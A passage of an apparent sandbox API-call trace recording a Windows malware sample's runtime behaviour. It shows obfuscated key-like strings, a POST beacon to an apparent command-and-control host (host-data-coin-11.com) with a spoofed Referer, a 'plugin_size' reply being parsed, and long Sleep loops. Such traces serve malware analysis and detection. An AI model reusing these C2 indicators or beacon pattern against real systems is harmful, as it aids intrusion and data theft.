(in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ec0147 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b97ef92 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x308d0359 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4648d461 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x780fbb4f [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a0798eb [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77581393 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e7fde58 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc9e12bd [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x428e2211 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x332c0151 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69ba173b [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d5d9d38 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b025d84 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2db62b07 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x98b6955 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41b3bd41 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x321d466b [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a00a20d [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf6af1c9 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b83fb1 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x615cb128 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f15e28a [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33147336 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12675e17 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3abb399e [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeb50886 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c5706a7 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43ab8a45 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34bb6223 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b3d6035 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b3048d9 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e1dd3c5 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51e25e82 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5fcb4488 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c1f91fb [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30f185b5 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b1b22f9 [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x271a7f4c [0255.056] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28d0e2b8 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6419b818 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a45e928 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e247041 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21fb7871 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5cdafdec [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5824dd37 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x147fb991 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40f8e569 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a7aff9f [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e187f9 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d1abee [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b8fe62f [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x330c0a8e [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6aade99e [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71a6dfb3 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d9a613e [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71c7fbca [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57f4c6b9 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3be32228 [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f3b9a8c [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2a9114fb [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x360d8d9f [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x251b03fb [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6859d2df [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e2847af [0255.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x767d5145 [0255.059] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0255.059] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0255.059] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0255.059] lstrcatA (in: lpString1="", lpString2="eJ4\\&nj31qpi#GVf*Y^P(Lp[>%z'jq-#b9yiVi1vqnRTPzYkzGSi)\\0R5f5[7zn]Z0Et'B)!g,gId^`Sw`$\"QpVB-rS*u\\yIaN\"wbfc@:\\)%f[J^:OrhKiw_VdN!88KvL^3Ih4tHTH7pyOEPa-=_Xi,^h$.7PpZj)OdtB\"v8Dm=?.gUFvxbyupYUFU-rNgN" | out: lpString1="eJ4\\&nj31qpi#GVf*Y^P(Lp[>%z'jq-#b9yiVi1vqnRTPzYkzGSi)\\0R5f5[7zn]Z0Et'B)!g,gId^`Sw`$\"QpVB-rS*u\\yIaN\"wbfc@:\\)%f[J^:OrhKiw_VdN!88KvL^3Ih4tHTH7pyOEPa-=_Xi,^h$.7PpZj)OdtB\"v8Dm=?.gUFvxbyupYUFU-rNgN") returned="eJ4\\&nj31qpi#GVf*Y^P(Lp[>%z'jq-#b9yiVi1vqnRTPzYkzGSi)\\0R5f5[7zn]Z0Et'B)!g,gId^`Sw`$\"QpVB-rS*u\\yIaN\"wbfc@:\\)%f[J^:OrhKiw_VdN!88KvL^3Ih4tHTH7pyOEPa-=_Xi,^h$.7PpZj)OdtB\"v8Dm=?.gUFvxbyupYUFU-rNgN" [0255.059] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10c) returned 0x82f2680 [0255.059] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0255.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x82f2300, cbMultiByte=30, lpWideCharStr=0x82f2680, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0255.059] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x814f518 | out: pProxyConfig=0x814f518) returned 1 [0255.082] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb0120 [0255.084] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x814f5d0 | out: lpUrlComponents=0x814f5d0) returned 1 [0255.084] WinHttpConnect (hSession=0x3fb0120, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3fa9cf0 [0255.084] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f27a0 [0255.084] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x68) returned 0x82f27c0 [0255.084] WinHttpOpenRequest (hConnect=0x3fa9cf0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x6e9a680 [0255.085] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x4e) returned 0x82f2830 [0255.085] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10d) returned 0x82f2890 [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2988315f [0255.085] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f29b0 [0255.085] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x17) returned 0x82f29d0 [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x44a0dafc [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x285ef543 [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x261e172e [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x291c370d [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x171d615a [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x221f57e6 [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3050425c [0255.085] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x76310e05 [0255.085] wsprintfW (in: param_1=0x82f2890, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://lwhjmlq.com/") returned 41 [0255.085] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f29d0) returned 0x17 [0255.085] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f29d0) returned 1 [0255.085] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f29b0) returned 0x12 [0255.085] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f29b0) returned 1 [0255.085] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2830) returned 0x4e [0255.086] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2830) returned 1 [0255.086] WinHttpAddRequestHeaders (hRequest=0x6e9a680, pwszHeaders="Accept: */*\r\nReferer: http://lwhjmlq.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0255.086] WinHttpSendRequest (hRequest=0x6e9a680, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x82f2500*, dwOptionalLength=0x16c, dwTotalLength=0x16c, dwContext=0x0) returned 1 [0255.624] WinHttpReceiveResponse (hRequest=0x6e9a680, lpReserved=0x0) returned 1 [0255.625] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x2800) returned 0x82f29b0 [0255.625] WinHttpReadData (in: hRequest=0x6e9a680, lpBuffer=0x82f29b0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f29b0*, lpdwNumberOfBytesRead=0x814f688*=0x18) returned 1 [0255.626] RtlReAllocateHeap (Heap=0x82f0000, Flags=0x8, Ptr=0x82f29b0, Size=0x5000) returned 0x82f29b0 [0255.627] WinHttpReadData (in: hRequest=0x6e9a680, lpBuffer=0x82f29c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f29c8*, lpdwNumberOfBytesRead=0x814f688*=0x0) returned 1 [0255.627] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2810000 [0255.643] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f29b0) returned 1 [0255.643] WinHttpCloseHandle (hInternet=0x6e9a680) returned 1 [0255.643] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2890) returned 0x10d [0255.644] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2890) returned 1 [0255.644] WinHttpCloseHandle (hInternet=0x3fa9cf0) returned 1 [0255.644] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f27c0) returned 0x68 [0255.644] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f27c0) returned 1 [0255.644] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f27a0) returned 0x12 [0255.644] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f27a0) returned 1 [0255.644] WinHttpCloseHandle (hInternet=0x3fb0120) returned 1 [0255.644] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2680) returned 0x10c [0255.645] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2680) returned 1 [0255.645] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f23d0) returned 0x126 [0255.645] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f23d0) returned 1 [0255.645] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2500) returned 0x175 [0255.645] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2500) returned 1 [0255.645] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0255.645] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x15) returned 0x82f23d0 [0255.646] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0255.646] lstrlenA (lpString="plugin_size") returned 11 [0255.646] atoi (_Str="0") returned 0 [0255.646] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0255.646] lstrlenA (lpString="|:|") returned 3 [0255.646] MapViewOfFile (hFileMappingObject=0x1490, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x46a0000 [0255.657] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0255.657] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x46a0000) returned 0x0 [0255.691] atoi (_Str="0") returned 0 [0255.691] VirtualFree (lpAddress=0x2810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0255.692] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x26 [0255.692] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0255.692] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0255.693] Sleep (dwMilliseconds=0x258) [0255.714] Sleep (dwMilliseconds=0x258) [0255.718] Sleep (dwMilliseconds=0x258) [0255.734] Sleep (dwMilliseconds=0x258) [0255.783] Sleep (dwMilliseconds=0x258) [0255.843] Sleep (dwMilliseconds=0x258) [0255.858] Sleep (dwMilliseconds=0x258) [0255.879] Sleep (dwMilliseconds=0x258) [0255.891] Sleep (dwMilliseconds=0x258) [0255.952] Sleep (dwMilliseconds=0x258) [0256.016] Sleep (dwMilliseconds=0x258) [0256.041] Sleep (dwMilliseconds=0x258) [0256.045] Sleep (dwMilliseconds=0x258) [0256.061] Sleep (dwMilliseconds=0x258) [0256.124] Sleep (dwMilliseconds=0x258) [0256.186] Sleep (dwMilliseconds=0x258) [0256.202] Sleep (dwMilliseconds=0x258) [0256.218] Sleep (dwMilliseconds=0x258) [0256.280] Sleep (dwMilliseconds=0x258) [0256.343] Sleep (dwMilliseconds=0x258) [0256.358] Sleep (dwMilliseconds=0x258) [0256.373] Sleep (dwMilliseconds=0x258) [0256.435] Sleep (dwMilliseconds=0x258) [0256.498] Sleep (dwMilliseconds=0x258) [0256.513] Sleep (dwMilliseconds=0x258) [0256.529] Sleep (dwMilliseconds=0x258) [0256.592] Sleep (dwMilliseconds=0x258) [0256.654] Sleep (dwMilliseconds=0x258) [0256.669] Sleep (dwMilliseconds=0x258) [0256.686] Sleep (dwMilliseconds=0x258) [0256.720] Sleep (dwMilliseconds=0x258) [0256.763] Sleep (dwMilliseconds=0x258) [0256.810] Sleep (dwMilliseconds=0x258) [0256.828] Sleep (dwMilliseconds=0x258) [0256.841] Sleep (dwMilliseconds=0x258) [0256.857] Sleep (dwMilliseconds=0x258) [0256.885] Sleep (dwMilliseconds=0x258) [0256.888] Sleep (dwMilliseconds=0x258) [0256.905] Sleep (dwMilliseconds=0x258) [0256.967] Sleep (dwMilliseconds=0x258) [0257.013] Sleep (dwMilliseconds=0x258) [0257.036] Sleep (dwMilliseconds=0x258) [0257.045] Sleep (dwMilliseconds=0x258) [0257.061] Sleep (dwMilliseconds=0x258) [0257.076] Sleep (dwMilliseconds=0x258) [0257.091] Sleep (dwMilliseconds=0x258) [0257.107] Sleep (dwMilliseconds=0x258) [0257.169] Sleep (dwMilliseconds=0x258) [0257.216] Sleep (dwMilliseconds=0x258) [0257.242] Sleep (dwMilliseconds=0x258) [0257.247] Sleep (dwMilliseconds=0x258) [0257.262] Sleep (dwMilliseconds=0x258) [0257.278] Sleep (dwMilliseconds=0x258) [0257.295] Sleep (dwMilliseconds=0x258) [0257.310] Sleep (dwMilliseconds=0x258) [0257.371] Sleep (dwMilliseconds=0x258) [0257.418] Sleep (dwMilliseconds=0x258) [0257.434] Sleep (dwMilliseconds=0x258) [0257.450] Sleep (dwMilliseconds=0x258) [0257.468] Sleep (dwMilliseconds=0x258) [0257.481] Sleep (dwMilliseconds=0x258) [0257.496] Sleep (dwMilliseconds=0x258) [0257.513] Sleep (dwMilliseconds=0x258) [0257.574] Sleep (dwMilliseconds=0x258) [0257.622] Sleep (dwMilliseconds=0x258) [0257.642] Sleep (dwMilliseconds=0x258) [0257.652] Sleep (dwMilliseconds=0x258) [0257.668] Sleep (dwMilliseconds=0x258) [0257.685] Sleep (dwMilliseconds=0x258) [0257.717] Sleep (dwMilliseconds=0x258) [0257.777] Sleep (dwMilliseconds=0x258) [0257.810] Sleep (dwMilliseconds=0x258) [0257.840] Sleep (dwMilliseconds=0x258) [0257.864] Sleep (dwMilliseconds=0x258) [0257.871] Sleep (dwMilliseconds=0x258) [0257.886] Sleep (dwMilliseconds=0x258) [0257.903] Sleep (dwMilliseconds=0x258) [0257.950] Sleep (dwMilliseconds=0x258) [0257.995] Sleep (dwMilliseconds=0x258) [0258.036] Sleep (dwMilliseconds=0x258) [0258.042] Sleep (dwMilliseconds=0x258) [0258.059] Sleep (dwMilliseconds=0x258) [0258.073] Sleep (dwMilliseconds=0x258) [0258.089] Sleep (dwMilliseconds=0x258) [0258.105] Sleep (dwMilliseconds=0x258) [0258.121] Sleep (dwMilliseconds=0x258) [0258.184] Sleep (dwMilliseconds=0x258) [0258.230] Sleep (dwMilliseconds=0x258) [0258.250] Sleep (dwMilliseconds=0x258) [0258.261] Sleep (dwMilliseconds=0x258) [0258.276] Sleep (dwMilliseconds=0x258) [0258.293] Sleep (dwMilliseconds=0x258) [0258.308] Sleep (dwMilliseconds=0x258) [0258.323] Sleep (dwMilliseconds=0x258) [0258.385] Sleep (dwMilliseconds=0x258) [0258.433] Sleep (dwMilliseconds=0x258) [0258.461] Sleep (dwMilliseconds=0x258) [0258.464] Sleep (dwMilliseconds=0x258) [0258.479] Sleep (dwMilliseconds=0x258) [0258.495] Sleep (dwMilliseconds=0x258) [0258.511] Sleep (dwMilliseconds=0x258) [0258.526] Sleep (dwMilliseconds=0x258) [0258.588] Sleep (dwMilliseconds=0x258) [0258.636] Sleep (dwMilliseconds=0x258) [0258.730] Sleep (dwMilliseconds=0x258) [0258.776] Sleep (dwMilliseconds=0x258) [0258.822] Sleep (dwMilliseconds=0x258) [0258.873] Sleep (dwMilliseconds=0x258) [0258.889] Sleep (dwMilliseconds=0x258) [0258.900] Sleep (dwMilliseconds=0x258) [0258.916] Sleep (dwMilliseconds=0x258) [0258.931] Sleep (dwMilliseconds=0x258) [0258.948] Sleep (dwMilliseconds=0x258) [0259.009] Sleep (dwMilliseconds=0x258) [0259.057] Sleep (dwMilliseconds=0x258) [0259.072] Sleep (dwMilliseconds=0x258) [0259.088] Sleep (dwMilliseconds=0x258) [0259.103] Sleep (dwMilliseconds=0x258) [0259.119] Sleep (dwMilliseconds=0x258) [0259.135] Sleep (dwMilliseconds=0x258) [0259.150] Sleep (dwMilliseconds=0x258) [0259.212] Sleep (dwMilliseconds=0x258) [0259.259] Sleep (dwMilliseconds=0x258) [0259.313] Sleep (dwMilliseconds=0x258) [0259.321] Sleep (dwMilliseconds=0x258) [0259.337] Sleep (dwMilliseconds=0x258) [0259.353] Sleep (dwMilliseconds=0x258) [0259.369] Sleep (dwMilliseconds=0x258) [0259.431] Sleep (dwMilliseconds=0x258) [0259.477] Sleep (dwMilliseconds=0x258) [0259.504] Sleep (dwMilliseconds=0x258) [0259.509] Sleep (dwMilliseconds=0x258) [0259.524] Sleep (dwMilliseconds=0x258) [0259.540] Sleep (dwMilliseconds=0x258) [0259.555] Sleep (dwMilliseconds=0x258) [0259.571] Sleep (dwMilliseconds=0x258) [0259.587] Sleep (dwMilliseconds=0x258) [0259.649] Sleep (dwMilliseconds=0x258) [0259.711] Sleep (dwMilliseconds=0x258) [0259.740] Sleep (dwMilliseconds=0x258) [0259.743] Sleep (dwMilliseconds=0x258) [0259.758] Sleep (dwMilliseconds=0x258) [0259.774] Sleep (dwMilliseconds=0x258) [0259.790] Sleep (dwMilliseconds=0x258) [0259.805] Sleep (dwMilliseconds=0x258) [0259.867] Sleep (dwMilliseconds=0x258) [0259.945] Sleep (dwMilliseconds=0x258) [0259.983] Sleep (dwMilliseconds=0x258) [0259.992] Sleep (dwMilliseconds=0x258) [0260.008] Sleep (dwMilliseconds=0x258) [0260.024] Sleep (dwMilliseconds=0x258) [0260.040] Sleep (dwMilliseconds=0x258) [0260.102] Sleep (dwMilliseconds=0x258) [0260.149] Sleep (dwMilliseconds=0x258) [0260.176] Sleep (dwMilliseconds=0x258) [0260.179] Sleep (dwMilliseconds=0x258) [0260.195] Sleep (dwMilliseconds=0x258) [0260.212] Sleep (dwMilliseconds=0x258) [0260.226] Sleep (dwMilliseconds=0x258) [0260.242] Sleep (dwMilliseconds=0x258) [0260.304] Sleep (dwMilliseconds=0x258) [0260.337] Sleep (dwMilliseconds=0x258) [0260.386] Sleep (dwMilliseconds=0x258) [0260.398] Sleep (dwMilliseconds=0x258) [0260.414] Sleep (dwMilliseconds=0x258) [0260.430] Sleep (dwMilliseconds=0x258) [0260.445] Sleep (dwMilliseconds=0x258) [0260.507] Sleep (dwMilliseconds=0x258) [0260.555] Sleep (dwMilliseconds=0x258) [0260.575] Sleep (dwMilliseconds=0x258) [0260.587] Sleep (dwMilliseconds=0x258) [0260.601] Sleep (dwMilliseconds=0x258) [0260.617] Sleep (dwMilliseconds=0x258) [0260.632] Sleep (dwMilliseconds=0x258) [0260.648] Sleep (dwMilliseconds=0x258) [0260.664] Sleep (dwMilliseconds=0x258) [0260.726] Sleep (dwMilliseconds=0x258) [0260.788] Sleep (dwMilliseconds=0x258) [0260.813] Sleep (dwMilliseconds=0x258) [0260.823] Sleep (dwMilliseconds=0x258) [0260.836] Sleep (dwMilliseconds=0x258) [0260.850] Sleep (dwMilliseconds=0x258) [0260.866] Sleep (dwMilliseconds=0x258) [0260.881] Sleep (dwMilliseconds=0x258) [0260.945] Sleep (dwMilliseconds=0x258) [0260.991] Sleep (dwMilliseconds=0x258) [0261.042] Sleep (dwMilliseconds=0x258) [0261.054] Sleep (dwMilliseconds=0x258) [0261.069] Sleep (dwMilliseconds=0x258) [0261.084] Sleep (dwMilliseconds=0x258) [0261.100] Sleep (dwMilliseconds=0x258) [0261.164] Sleep (dwMilliseconds=0x258) [0261.209] Sleep (dwMilliseconds=0x258) [0261.239] Sleep (dwMilliseconds=0x258) [0261.240] Sleep (dwMilliseconds=0x258) [0261.257] Sleep (dwMilliseconds=0x258) [0261.274] Sleep (dwMilliseconds=0x258) [0261.287] Sleep (dwMilliseconds=0x258) [0261.303] Sleep (dwMilliseconds=0x258) [0261.318] Sleep (dwMilliseconds=0x258) [0261.382] Sleep (dwMilliseconds=0x258) [0261.428] Sleep (dwMilliseconds=0x258) [0261.467] Sleep (dwMilliseconds=0x258) [0261.474] Sleep (dwMilliseconds=0x258) [0261.491] Sleep (dwMilliseconds=0x258) [0261.506] Sleep (dwMilliseconds=0x258) [0261.521] Sleep (dwMilliseconds=0x258) [0261.537] Sleep (dwMilliseconds=0x258) [0261.600] Sleep (dwMilliseconds=0x258) [0261.646] Sleep (dwMilliseconds=0x258) [0261.689] Sleep (dwMilliseconds=0x258) [0261.693] Sleep (dwMilliseconds=0x258) [0261.709] Sleep (dwMilliseconds=0x258) [0261.724] Sleep (dwMilliseconds=0x258) [0261.746] Sleep (dwMilliseconds=0x258) [0261.755] Sleep (dwMilliseconds=0x258) [0261.844] Sleep (dwMilliseconds=0x258) [0261.881] Sleep (dwMilliseconds=0x258) [0261.938] Sleep (dwMilliseconds=0x258) [0261.942] Sleep (dwMilliseconds=0x258) [0261.959] Sleep (dwMilliseconds=0x258) [0261.981] Sleep (dwMilliseconds=0x258) [0261.989] Sleep (dwMilliseconds=0x258) [0262.005] Sleep (dwMilliseconds=0x258) [0262.075] Sleep (dwMilliseconds=0x258) [0262.114] Sleep (dwMilliseconds=0x258) [0262.147] Sleep (dwMilliseconds=0x258) [0262.161] Sleep (dwMilliseconds=0x258) [0262.178] Sleep (dwMilliseconds=0x258) [0262.192] Sleep (dwMilliseconds=0x258) [0262.208] Sleep (dwMilliseconds=0x258) [0262.270] Sleep (dwMilliseconds=0x258) [0262.333] Sleep (dwMilliseconds=0x258) [0262.353] Sleep (dwMilliseconds=0x258) [0262.364] Sleep (dwMilliseconds=0x258) [0262.379] Sleep (dwMilliseconds=0x258) [0262.400] Sleep (dwMilliseconds=0x258) [0262.411] Sleep (dwMilliseconds=0x258) [0262.427] Sleep (dwMilliseconds=0x258) [0262.488] Sleep (dwMilliseconds=0x258) [0262.536] Sleep (dwMilliseconds=0x258) [0262.554] Sleep (dwMilliseconds=0x258) [0262.566] Sleep (dwMilliseconds=0x258) [0262.582] Sleep (dwMilliseconds=0x258) [0262.598] Sleep (dwMilliseconds=0x258) [0262.613] Sleep (dwMilliseconds=0x258) [0262.629] Sleep 